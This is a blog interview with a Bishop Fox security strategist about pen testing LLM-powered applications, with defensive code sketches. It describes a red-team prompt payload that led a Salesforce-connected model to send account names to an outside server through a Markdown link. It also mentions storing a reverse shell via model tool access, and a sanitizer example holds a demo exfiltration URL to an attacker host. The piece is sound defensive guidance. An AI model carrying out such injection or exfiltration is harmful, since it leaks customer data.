Tales from the Forefront: Demystifying AI and LLM Pen Testing with Rob Ragan of Bishop Fox
Kathryn Shih
July 30, 2024
- Blog Post
Rob Ragan is a Principal Technology Strategist at Bishop Fox, a leading authority in offensive security and provider of enterprise penetration testing (pen testing), red teaming, and attack surface management.
Rob is a principal architect and researcher who specializes in security automation. He is an expert on innovative methodologies including LLM Integration Testing and drives cross-functional efforts to align technology strategy and business objectives across Bishop Fox’s Product, Sales, Marketing, and R&D teams.
Today we’re excited to speak with Rob about his insights from pen testing AI and LLM integrations for Bishop Fox’s extensive base of customers.
Kathryn Shih [KS]
Rob, tell us about the history of AI pen testing at Bishop Fox and how you’ve seen LLM pen testing emerge and evolve. Where did it all begin and what types of customer use cases are you working with today?
Rob Ragan [RR]
Some of the earliest machine learning products we tested at Bishop Fox were systems designed to capture images for autonomous car training and systems which processed data for use in model training. We often looked at how intellectual property was being protected (or not) as data was collected and stored not just in the applications, but throughout the broader infrastructure.
Over the last 18 months, more and more of our customers have started to reach out about GenAI and LLMs. That brings us to today, where we’re seeing AI and LLM use cases across every industry and vertical. There are many internal business use cases for employees, some of which are more experimental and others of which use off-the-shelf AI and LLM products. Often, these are summarization use cases involving knowledge base search and retrieval or similarity search over text documents, where the goal is to help employees perform tasks using natural language. In other instances, companies are leveraging AI for assistant use cases. For example, some of our customers are using LLMs to integrate complicated security and IT product settings with natural language so employees can describe the functionality they want and receive an example configuration.
There are also some interesting automation use cases. Some companies are pairing discriminative machine learning models (which predict future outcomes based on how decisions have been made in the past) with LLMs to help employees interpret model outputs and interact with models. By discriminative ML models I mean advanced automated decision-making for things like deciding if an incoming email is spam, if a package will arrive on time, or if an autonomous car is approaching a red light.
At this point, far fewer companies have AI or LLM implementations that are externally available in their products and to their customers. If they do, it’s often something like a customer support chatbot and is typically a very early version. For example, some of the companies we work with in the education space are using chatbots to help teachers tutor students or leveraging GenAI to assist educators as they generate content and update syllabi.
We also work with a lot of vendors building products using AI or LLMs. Some are developing platforms that allow you to build your own chatbot for unique business use cases. Others are building ChatOps platforms that can be queried with natural language and use plugins and system access to retrieve data and accomplish tasks. These vendor AI implementations tend to be the farthest along across our customer base.
Testing is paramount to the success of these products and features; we aren’t seeing much resilience in the first versions we test, as these use cases are often rushed to release. However, vendors building products with AI and LLMs have put the most effort into security architecture, thinking through abuse cases, and building multiple layers of defense. They often have security controls that try to sanitize or validate user input and to review and process model output. More often than not, these product companies have seen what can go wrong with AI and get a lot of feedback from their customers.
KS
Let’s zoom out for a moment before we dive into the details. A lot of people conflate pen testing for LLMs and pen testing for LLM-powered applications. How do you distinguish the two? Do security problems or mitigations tend to come from the LLM or the application around it?
RR
At Bishop Fox, we differentiate by whether we are testing the integration and overall application, or the model interactions and the layers that validate input or sanitize output. Most commonly, we’re asked to test the entire application environment: pen testing for AI- or LLM-powered applications. That’s where we see a lot of common application vulnerabilities and fundamental issues in these early versions.
Many companies face pressure to hit deadlines, rush their use cases, and subsequently make fundamental application security mistakes. For example, we’ve seen simple issues like being able to modify the session identifier to see someone else’s chatbot log. Those types of application integration issues need to be tested for and reviewed.
“Many companies face pressure to hit deadlines, rush their use cases, and subsequently make fundamental application security mistakes. For example, we’ve seen simple issues like being able to modify the session identifier to see someone else's chatbot log. Those types of application integration issues need to be tested for and reviewed.”
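To illustrate the kind of check that prevents that class of issue, here is a minimal sketch of a chat-log endpoint that verifies conversation ownership before returning anything; the Flask-style route and the conversation_owner and load_chat_log helpers are hypothetical stand-ins for a real storage layer, not any specific client’s implementation.

```python
# Minimal sketch (hypothetical names): never trust a client-supplied conversation ID
# on its own; always verify it belongs to the authenticated user before returning a log.
from flask import Flask, abort, jsonify, session

app = Flask(__name__)

def conversation_owner(conversation_id: str) -> str:
    """Hypothetical lookup of the user who owns a conversation; replace with your storage layer."""
    raise NotImplementedError

def load_chat_log(conversation_id: str) -> dict:
    """Hypothetical data-access helper; replace with your storage layer."""
    raise NotImplementedError

@app.route("/chats/<conversation_id>")
def get_chat(conversation_id: str):
    current_user = session.get("user_id")
    if current_user is None:
        abort(401)  # not authenticated
    # The vulnerable pattern skips this check and returns any log the caller asks for.
    if conversation_owner(conversation_id) != current_user:
        abort(403)  # authenticated, but not the owner of this conversation
    return jsonify(load_chat_log(conversation_id))
```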
However, some companies just want to focus on interactions with the AI or LLM model itself and test for jailbreaking (methods of bypassing model safety restrictions) or prompt injection issues. We prefer to take an approach that comprehensively looks at all the components involved in model integrations. Most companies take an open-source or foundation model from a major provider, leverage hosting services like Azure AI Studio, and then build their application around that; they may also perform RAG (retrieval-augmented generation) to customize the data the application can access. It’s always more impactful from a testing perspective to look at how the model is integrated and to review the design, threats, and security controls between the components and layers.
KS
Interesting, so the whole application environment needs to be tested in most cases. I’m sure you have seen plenty of vulnerabilities as more customers integrate AI and LLM models. What are some of the most notable security issues Bishop Fox has worked on?
RR
Remote code execution comes to mind. Some AI products give access to other tools through a prompt; if the system can perform network requests or download and store data on the file system, an attacker may be able to store a reverse shell script and later retrieve it through other means. Attackers may also be able to abuse the system’s access to API keys stored in the system prompt or other components.
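One way to reduce that exposure is to keep credentials out of anything the model can echo and to expose only narrowly scoped tools. The sketch below is illustrative only; the CRM_API_KEY environment variable, crm_lookup tool, and tool registry are hypothetical names, not a specific product’s design.

```python
# Minimal sketch: secrets stay in the integration layer, never in the prompt, and the
# model only gets read-only, narrowly scoped tools (no shell, file writes, or arbitrary fetches).
import os

CRM_API_KEY = os.environ.get("CRM_API_KEY", "")  # loaded server-side; never placed in prompt text

def crm_lookup(account_name: str) -> dict:
    """Hypothetical read-only tool; uses the key internally and returns data only."""
    raise NotImplementedError

# Expose only the specific capabilities the use case needs.
TOOL_REGISTRY = {
    "crm_lookup": crm_lookup,
}

SYSTEM_PROMPT = (
    "You are a sales assistant. You may call the crm_lookup tool to answer questions "
    "about accounts."  # note: no credentials, hostnames, or connection strings in here
)
```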
Another issue we’ve seen is that a model output interface can be exploited if it renders JavaScript, HTML, or Markdown. In one case, a client was using a plugin with access to Salesforce so their employees could prompt the model about customer accounts and sales opportunities. To simulate an attack, we crafted a payload that retrieved every Salesforce account name, encoded it to be stored in a URL query string parameter, and turned it into a Markdown link leading to a server we controlled. When a user interacted with the link, it sent all the Salesforce account names to our server.
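A common mitigation for that kind of exfiltration is to neutralize links in model output before it is rendered. Here is a minimal sketch that strips Markdown links unless they point to an allowlisted host; the regex, the allowlist, and the example payload are simplified assumptions rather than a complete defense.

```python
# Minimal sketch: strip Markdown links from model output unless they point at an
# allowlisted host, so rendered output can't smuggle data out via crafted URLs.
import re
from urllib.parse import urlparse

ALLOWED_LINK_HOSTS = {"example.com"}  # placeholder allowlist of trusted hosts

MD_LINK = re.compile(r"\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def sanitize_markdown_links(model_output: str) -> str:
    def replace(match: re.Match) -> str:
        text, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_LINK_HOSTS:
            return match.group(0)           # keep links to trusted hosts as-is
        return f"{text} [link removed]"     # drop everything else, including data-bearing query strings
    return MD_LINK.sub(replace, model_output)

if __name__ == "__main__":
    demo = "Accounts: [click here](https://attacker.example.net/?q=Acme,Globex)"
    print(sanitize_markdown_links(demo))    # -> "Accounts: click here [link removed]"
```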
KS
There are definitely some pre-GenAI analogies there, like how you need to escape HTML, JavaScript, and CSS characters when putting user-generated data on a webpage.
Besides security vulnerabilities like the ones you mentioned, are companies overlooking anything else when it comes to their AI and LLM integrations?
RR
Availability is one of the biggest things companies miss. For example, over the last 90 days OpenAI has had less than two nines of uptime (<99%), which translates to hours of downtime each month. If you’re relying on OpenAI or another provider for day-to-day usage in production or across your employee base, that’s a big problem. Companies need a redundancy plan and a backup switch to activate another provider if their primary provider goes down, but most haven’t built this capability into their systems yet.
Latency is another major factor companies overlook. They need controls to detect both whether the LLM is taking too long to respond and which component is causing the delay. Latency may come from the model provider, a security layer, or a monitoring layer.
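As a sketch of how both of those concerns can sit in the integration layer, the wrapper below times each call, enforces a latency budget, and fails over to a second provider; call_openai, call_fallback_provider, and the 10-second budget are placeholders rather than recommendations.

```python
# Minimal sketch: per-call latency measurement, a hard timeout, and provider failover.
import logging
import time
from concurrent.futures import ThreadPoolExecutor

log = logging.getLogger("llm_gateway")
LATENCY_BUDGET_SECONDS = 10.0          # placeholder budget; tune per use case
_pool = ThreadPoolExecutor(max_workers=4)

def call_openai(prompt: str) -> str:              # placeholder for the real client
    raise NotImplementedError

def call_fallback_provider(prompt: str) -> str:   # placeholder for a second provider
    raise NotImplementedError

def complete(prompt: str) -> str:
    for name, provider in (("primary", call_openai), ("fallback", call_fallback_provider)):
        start = time.monotonic()
        future = _pool.submit(provider, prompt)
        try:
            # result() raises on provider errors and on exceeding the latency budget.
            result = future.result(timeout=LATENCY_BUDGET_SECONDS)
            log.info("%s responded in %.2fs", name, time.monotonic() - start)
            return result
        except Exception as exc:
            log.warning("%s failed after %.2fs: %s", name, time.monotonic() - start, exc)
    raise RuntimeError("all LLM providers failed or timed out")
```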
Most companies aren’t considering anti-automation controls, either. If an attacker deploys a bot against a company’s endpoint and spikes usage costs, the company might not detect it until it receives a giant bill. Denial of wallet is a real threat here, especially if the company has usage caps that limit its spending: a bot or attack can push it over the cap, preventing legitimate users from accessing the system. It’s one of the most unexpected and common issues we’ve seen and is among the top 15 findings we report to our customers.
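To illustrate the anti-automation and denial-of-wallet points, here is a minimal sketch of a per-client sliding-window rate limit paired with a daily spend alert; the ceilings, the per-token price, and the alerting mechanism are all illustrative assumptions.

```python
# Minimal sketch: a sliding-window rate limit per client plus a daily spend alert, so a
# bot hammering the endpoint is caught long before the monthly bill or a hard usage cap.
# The ceilings and the per-token price are illustrative placeholders.
import time
from collections import defaultdict, deque

MAX_REQUESTS_PER_MINUTE = 30        # illustrative per-client ceiling
DAILY_SPEND_ALERT_USD = 200.0       # illustrative alert threshold
EST_COST_PER_1K_TOKENS_USD = 0.01   # illustrative; use your provider's actual pricing

_recent_requests = defaultdict(deque)
_spend_today_usd = 0.0

def allow_request(client_id: str) -> bool:
    """Reject the request if this client has exceeded its per-minute ceiling."""
    now = time.time()
    window = _recent_requests[client_id]
    while window and now - window[0] > 60:
        window.popleft()                 # drop requests older than the 60-second window
    if len(window) >= MAX_REQUESTS_PER_MINUTE:
        return False
    window.append(now)
    return True

def record_usage(tokens_used: int) -> None:
    """Track estimated spend and raise an alert as soon as the daily threshold is crossed."""
    global _spend_today_usd
    _spend_today_usd += tokens_used / 1000 * EST_COST_PER_1K_TOKENS_USD
    if _spend_today_usd > DAILY_SPEND_ALERT_USD:
        print(f"ALERT: estimated LLM spend today is ${_spend_today_usd:.2f}")
```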
In addition, companies using RAG need to evaluate how accurate it is instead of assuming it simply eliminates all hallucinations. This involves building test cases into the system to evaluate accuracy and determine if outcomes deviate from the expected behavior, especially as the system changes over time.
There’s the consideration of accuracy here as well: does your use case need the model to be 100% accurate or 96.8% accurate, and how do you ensure that level of accuracy?
“In addition, companies using RAG need to evaluate how accurate it is instead of assuming it simply eliminates all hallucinations. This involves building test cases into the system to evaluate accuracy and determine if outcomes deviate from the expected behavior, especially as the system changes over time.”
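In practice, that can look like a small regression suite run against the RAG pipeline whenever the data, prompts, or model version changes. The sketch below is a simplified illustration; rag_answer(), the evaluation cases, and the accuracy threshold are placeholders to be replaced with real expected outcomes.

```python
# Minimal sketch: a regression-style accuracy check for a RAG pipeline. rag_answer()
# stands in for the real retrieval + generation call; cases and threshold are placeholders.
EVAL_CASES = [
    {"question": "What is our refund window?", "must_contain": ["30 days"]},
    {"question": "Which plan includes SSO?", "must_contain": ["Enterprise"]},
]
ACCURACY_THRESHOLD = 0.95  # placeholder; pick the level your use case actually needs

def rag_answer(question: str) -> str:
    """Placeholder for the real retrieval-augmented pipeline."""
    raise NotImplementedError

def run_eval() -> float:
    passed = 0
    for case in EVAL_CASES:
        answer = rag_answer(case["question"])
        if all(snippet.lower() in answer.lower() for snippet in case["must_contain"]):
            passed += 1
        else:
            print(f"FAIL: {case['question']!r} -> {answer!r}")
    accuracy = passed / len(EVAL_CASES)
    print(f"accuracy: {accuracy:.1%}")
    assert accuracy >= ACCURACY_THRESHOLD, "RAG accuracy regressed below the agreed threshold"
    return accuracy
```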
Companies should also consider cases where they might want to route users to something outside of the AI model. If you detect that a user is asking about something sensitive, maybe you can avoid ambiguity by routing them to the source of truth, referencing the raw language from a policy, or introducing a human in the loop for especially sensitive topics like pricing, refunds, or discounts.
KS
So that’s where companies aren’t paying enough attention. Are there any areas where companies spend too much time when integrating AI?
RR
I’ve seen companies pour a lot of energy and resources into creating a deny list to limit LLM functionality and detect jailbreaks or prompt injections. This isn’t very effective because it’s essentially impossible to create a list that denies every bad interaction for things like toxicity. We’ve been advising companies to instead create an allow list of the functionality they expect, based on their customer support FAQs or how they want a customer support agent to act. That creates a much smaller set of talk tracks and language than a list of everything that could go wrong. This is a fundamental security principle (using allow lists instead of deny lists); however, we’re seeing this mistake from data science teams that think they can ML their way out of the problem.
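As a simplified illustration of that allow-list approach, the sketch below routes requests by intent and refuses anything outside the expected talk tracks; classify_intent() and the intent set are hypothetical, and the classifier behind them could be a lightweight model, embedding similarity against the FAQ, or another LLM call.

```python
# Minimal sketch: classify each request against the small set of things the assistant
# is supposed to do (the allow list) and refuse everything else, instead of trying to
# enumerate every bad prompt in a deny list.
ALLOWED_INTENTS = {
    "order_status",
    "shipping_policy",
    "password_reset",
    "product_question",
}

def classify_intent(user_message: str) -> str:
    """Placeholder intent classifier (lightweight model, FAQ similarity, or an LLM call)."""
    raise NotImplementedError

def answer_with_llm(intent: str, user_message: str) -> str:
    """Placeholder for the model call that handles an allowed intent."""
    raise NotImplementedError

def handle_message(user_message: str) -> str:
    intent = classify_intent(user_message)
    if intent not in ALLOWED_INTENTS:
        # Anything outside the expected talk tracks gets a fixed, safe response instead
        # of being passed through to the model.
        return "I can help with orders, shipping, passwords, and product questions. Say 'human' to reach support."
    return answer_with_llm(intent, user_message)
```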
The other thing that companies often miss is the bigger MLOps picture. Too many companies focus on testing specific LLM API endpoints while their data is leaking in more traditional ways.
With AI and LLM integrations, there’s often a lot of data moving quickly through manual processes. At the same time, as data science teams become more involved in building AI systems, they’re going to face increasingly aggressive timelines. We expect to see more and more traditional breaches as a result: things like an employee accidentally exposing a bucket in a cloud environment or copying data somewhere they shouldn’t. Companies need a renewed focus on tabletop exercises, incident response plans, and red team/blue team live-fire exercises to protect their data science teams’ interactions with their crown-jewel data.
“The other thing that companies often miss is the bigger MLOps picture. Too many companies focus on testing specific LLM API endpoints while their data is leaking in more traditional ways.”
KS
That’s interesting. I’ve already been hearing from many people who are under tremendous pressure to launch GenAI features this year. At the implementation level, what security-related steps should teams prioritize if they face tight timelines?
RR
Some of the most important steps are performing early design reviews, establishing a taxonomy of threats and issues to test for, and defining ownership and responsibilities across the security and data science teams. It’s critical to build repeatable test cases as well. Testing your implementations early and often helps you steer away from decisions that won’t work in the final release.
KS
Let’s shift to the individual level for the last couple of questions. A lot of developers now find themselves working on AI and LLM-powered applications for the first time. As someone with experience pen testing applications with and without AI, where do you think intuition from software development carries over to AI use cases? What aspects of AI and LLMs might be new, even to experienced developers?
RR
Security fundamentals are important for any company integrating AI, including the principles of secure design, least privilege, and separation of duties. Companies also need to revisit each component in their architecture and define the data flow. What inputs and outputs does each component expect? What are all the business use cases and abuse cases? How can you build and rerun test cases as you evolve your implementation to ensure nothing breaks? All of this should be familiar to people with development experience.
On the other hand, AI integrations have unique nuances. In traditional software engineering, you test and security-review different versions of code to ensure proper functionality and fix issues. With an AI model, there are likely different versions of the model itself. You not only have to worry about the integration of the model and the code, but also about what a new version of the model might break or how it could introduce security issues. Model version testing must be built into the development pipeline.
In addition, business logic that was previously implemented with code in software often becomes conversational logic in an LLM. Preparing to accept any input and handle it safely becomes very important and requires a shift in approach. Teams need to focus on how to safely convert and handle inputs and where to add exceptions to avoid handling certain cases. For example, language models may not be designed to output “I don’t know,” requiring developers to build cases that generate errors in the system, respond with “I’m not sure how to answer that, let me link you to our official policy,” or output “Say ‘human’ to speak to a customer support representative.”
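Here is a minimal sketch of that kind of escape hatch, where unsupported or especially sensitive questions get a fixed response or a human handoff instead of a generated answer; retrieve_support(), generate(), and the sensitive-topic list are placeholders rather than a prescribed design.

```python
# Minimal sketch: give the system an explicit escape hatch instead of assuming the model
# will say "I don't know." Sensitive topics go to a human; unsupported questions get a
# fixed fallback pointing at the official policy.
SENSITIVE_TOPICS = {"pricing", "refund", "discount"}

def retrieve_support(question: str) -> list[str]:
    """Placeholder retrieval step; returns supporting passages, or an empty list."""
    raise NotImplementedError

def generate(question: str, passages: list[str]) -> str:
    """Placeholder model call that answers only from the supplied passages."""
    raise NotImplementedError

def answer(question: str) -> str:
    lowered = question.lower()
    if any(topic in lowered for topic in SENSITIVE_TOPICS):
        # Especially sensitive topics are routed to a person, not the model.
        return "For pricing, refunds, or discounts, say 'human' to speak to a representative."
    passages = retrieve_support(question)
    if not passages:
        # No supporting material: respond with a fixed fallback rather than improvising.
        return "I'm not sure how to answer that. Here is a link to our official policy: [policy link]"
    return generate(question, passages)
```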
KS
Rob, this has been a great conversation with so many valuable insights. Do you have any resource recommendations for people who want to learn more about AI and LLM applications and integrations?
RR
I highly recommend reading Designing Machine Learning Systems. That book helped me learn to holistically think about getting a machine learning implementation from research to production.
At Bishop Fox, we have done several projects experimenting with what causes data leaks and how companies can prevent them with data preparation and output sanitization. We are also maintaining a list of every open-source LLM testing tool we can find. As a note, most require a tailored test harness; testing with zero-shot prompting won’t be very effective.
I also recently hosted a webinar on testing LLM algorithms and participated in a fireside chat on AI and LLM security alongside industry leaders from Moveworks.
***
Follow Rob on LinkedIn and X to stay up to date with his latest insights on AI and LLM security testing.
Forgepoint Capital also recommends the following resources:
- European Union Agency for Cybersecurity (ENISA): Multilayer Framework for Good Cybersecurity Practices for AI